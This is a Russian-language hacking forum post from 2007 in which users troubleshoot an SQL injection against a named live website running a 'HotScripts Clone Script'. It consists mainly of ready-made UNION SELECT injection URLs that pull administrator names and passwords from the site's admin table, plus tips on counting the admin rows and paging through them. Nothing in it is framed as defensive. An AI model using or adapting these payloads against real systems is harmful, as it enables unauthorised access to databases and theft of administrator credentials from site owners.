20.11.2007, 18:34
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
С нами:
10200612
Репутация:
168
|
|
Сообщение от -=lebed=-
SQL-инъекция в HotScripts Clone Script
Как посмотреть остальных админов?
Почему запросы с limit и where не прокатывают?
Код:
_http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char(58),id)+from+sbwmd_admin+limit+1,1/*
_http://www.filelook.com/software-description.php?id=-1+select+admin_name+from+sbwmd_admin+where+id=2/*
Дальше всё аналогично предыдущему примеру: к в админку не пускает, файлы читать,имхо, нет привилегий, limit,where не катят. В чём косяк? я думаю нет там косяка, просто нету больше админов
1. _http://www.filelook.com/software-description.php?id=-1+union+select+count(admin_name)+from+sbwmd_admin/*
count возвращает кол 1
limit and order тоже работают
http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char (58),id)+from+sbwmd_admin+limit+0,1/*
, такая же история и с "+where+id=1/*"
|
|
|